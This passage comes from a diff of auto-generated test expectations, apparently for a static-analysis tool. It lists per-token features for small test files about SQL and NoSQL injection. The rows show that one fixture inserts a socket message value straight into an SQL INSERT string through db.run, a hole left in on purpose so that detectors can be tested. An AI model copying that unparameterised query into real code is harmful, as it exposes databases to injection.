autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:10:6:41 | exceptional return of new sql ... mory:') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:10:6:41 | new sql ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:10:6:41 | new sql ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:10:6:41 | new sql ... mory:') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:14:6:20 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:14:6:20 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:14:6:20 | sqlite3 | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:14:6:29 | sqlite3.Database | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:14:6:29 | sqlite3.Database | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:14:6:29 | sqlite3.Database | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:22:6:29 | Database | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:22:6:29 | Database | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:22:6:29 | Database | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:31:6:40 | ':memory:' | CalleeFlexibleAccessPath | sqlite3.Database | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:31:6:40 | ':memory:' | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:31:6:40 | ':memory:' | calleeImports | sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:31:6:40 | ':memory:' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:31:6:40 | ':memory:' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:31:6:40 | ':memory:' | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:6 | io | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:6 | io | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:6 | io | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:31 | io | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:31 | io | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:31 | io | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:31 | io = re ... .io')() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:31 | io = re ... .io')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:5:8:31 | io = re ... .io')() | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:16 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:16 | require | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:29 | exceptional return of require('socket.io') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:29 | exceptional return of require('socket.io') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:29 | exceptional return of require('socket.io') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:29 | require('socket.io') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:29 | require('socket.io') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:29 | require('socket.io') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:31 | exceptional return of require ... .io')() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:31 | exceptional return of require ... .io')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:31 | exceptional return of require ... .io')() | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:31 | require ... .io')() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:31 | require ... .io')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:10:8:31 | require ... .io')() | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:18:8:28 | 'socket.io' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:18:8:28 | 'socket.io' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:18:8:28 | 'socket.io' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:18:8:28 | 'socket.io' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:18:8:28 | 'socket.io' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:8:18:8:28 | 'socket.io' | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:9:2 | io | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:9:2 | io | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:9:2 | io | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:9:5 | io.on | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:9:5 | io.on | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:9:5 | io.on | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:13:2 | exceptional return of io.on(' ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:13:2 | exceptional return of io.on(' ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:13:2 | exceptional return of io.on(' ... });\\n}) | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:13:2 | io.on(' ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:13:2 | io.on(' ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:1:13:2 | io.on(' ... });\\n}) | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:4:9:5 | on | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:4:9:5 | on | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:4:9:5 | on | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:7:9:18 | 'connection' | CalleeFlexibleAccessPath | io.on | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:7:9:18 | 'connection' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:7:9:18 | 'connection' | calleeImports | socket.io | @@ -4338,6 +20749,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:7:9:18 | 'connection' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:7:9:18 | 'connection' | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:7:9:18 | 'connection' | receiverName | io | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | 'arguments' object of anonymous function | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | 'arguments' object of anonymous function | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | 'arguments' object of anonymous function | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | (socket ... });\\n} | CalleeFlexibleAccessPath | io.on | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | (socket ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | (socket ... });\\n} | calleeImports | socket.io | @@ -4345,6 +20761,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | (socket ... });\\n} | contextSurroundingFunctionParameters | (socket) | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | (socket ... });\\n} | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | (socket ... });\\n} | receiverName | io | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | exceptional return of anonymous function | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | exceptional return of anonymous function | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | exceptional return of anonymous function | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | return of anonymous function | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | return of anonymous function | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:21:13:1 | return of anonymous function | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | contextSurroundingFunctionParameters | (socket) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:9:22:9:27 | socket | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:8 | socket | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:8 | socket | contextSurroundingFunctionParameters | (socket) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:8 | socket | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:8 | socket | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:8 | socket | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:11 | socket.on | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:11 | socket.on | contextSurroundingFunctionParameters | (socket) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:11 | socket.on | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:11 | socket.on | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:10:11 | socket.on | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | exceptional return of socket. ... );\\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | exceptional return of socket. ... );\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | exceptional return of socket. ... );\\n }) | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | exceptional return of socket. ... );\\n }) | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | exceptional return of socket. ... );\\n }) | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | socket. ... );\\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | socket. ... );\\n }) | contextSurroundingFunctionParameters | (socket) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | socket. ... );\\n }) | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | socket. ... );\\n }) | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:3:12:4 | socket. ... );\\n }) | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:10:10:11 | on | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:10:10:11 | on | contextSurroundingFunctionParameters | (socket) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:10:10:11 | on | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:10:10:11 | on | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:10:10:11 | on | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:13:10:21 | 'newuser' | CalleeFlexibleAccessPath | socket.on | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:13:10:21 | 'newuser' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:13:10:21 | 'newuser' | contextFunctionInterfaces | | @@ -4353,6 +20814,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:13:10:21 | 'newuser' | enclosingFunctionName | io.on#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:13:10:21 | 'newuser' | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:13:10:21 | 'newuser' | receiverName | socket | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:10:23 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:10:23 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:10:23 | db | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:10:23 | db | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:10:23 | db | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | 'arguments' object of anonymous function | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | 'arguments' object of anonymous function | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | 'arguments' object of anonymous function | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | (handle ... `);\\n } | CalleeFlexibleAccessPath | socket.on | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | (handle ... `);\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | (handle ... `);\\n } | contextFunctionInterfaces | | @@ -4361,6 +20832,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | (handle ... `);\\n } | enclosingFunctionName | io.on#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | (handle ... `);\\n } | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | (handle ... `);\\n } | receiverName | socket | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | exceptional return of anonymous function | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | exceptional return of anonymous function | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | exceptional return of anonymous function | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | return of anonymous function | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | return of anonymous function | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:24:12:3 | return of anonymous function | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | contextSurroundingFunctionParameters | (socket)\n(handle) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:10:25:10:30 | handle | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:6 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:6 | db | contextSurroundingFunctionParameters | (socket)\n(handle) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:6 | db | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:6 | db | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:6 | db | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:10 | db.run | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:10 | db.run | contextSurroundingFunctionParameters | (socket)\n(handle) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:10 | db.run | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:10 | db.run | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:10 | db.run | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | db.run( ... ndle}`) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | db.run( ... ndle}`) | contextSurroundingFunctionParameters | (socket)\n(handle) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | db.run( ... ndle}`) | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | db.run( ... ndle}`) | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | db.run( ... ndle}`) | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | exceptional return of db.run( ... ndle}`) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | exceptional return of db.run( ... ndle}`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | exceptional return of db.run( ... ndle}`) | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | exceptional return of db.run( ... ndle}`) | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:5:11:54 | exceptional return of db.run( ... ndle}`) | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:8:11:10 | run | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:8:11:10 | run | contextSurroundingFunctionParameters | (socket)\n(handle) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:8:11:10 | run | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:8:11:10 | run | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:8:11:10 | run | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:12:11:53 | `INSERT ... andle}` | CalleeFlexibleAccessPath | db.run | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:12:11:53 | `INSERT ... andle}` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:12:11:53 | `INSERT ... andle}` | calleeImports | sqlite3 | @@ -4370,12 +20886,67 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:12:11:53 | `INSERT ... andle}` | enclosingFunctionName | io.on#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:12:11:53 | `INSERT ... andle}` | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:12:11:53 | `INSERT ... andle}` | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:13:11:43 | INSERT ... VALUES | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:13:11:43 | INSERT ... VALUES | contextSurroundingFunctionParameters | (socket)\n(handle) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:13:11:43 | INSERT ... VALUES | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:13:11:43 | INSERT ... VALUES | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:13:11:43 | INSERT ... VALUES | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:13:11:43 | INSERT ... VALUES | stringConcatenatedWith | -endpoint- handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:46:11:51 | handle | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:46:11:51 | handle | contextSurroundingFunctionParameters | (socket)\n(handle) | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:46:11:51 | handle | enclosingFunctionBody | socket socket on newuser handle db run INSERT INTO users(name) VALUES handle | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:46:11:51 | handle | enclosingFunctionName | io.on#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:46:11:51 | handle | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:11:46:11:51 | handle | stringConcatenatedWith | 'INSERT INTO users(name) VALUES ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:0 | this | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:1 | require | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:1 | sql | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:1 | sql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:1:1:1 | sql | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:11 | express | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:32 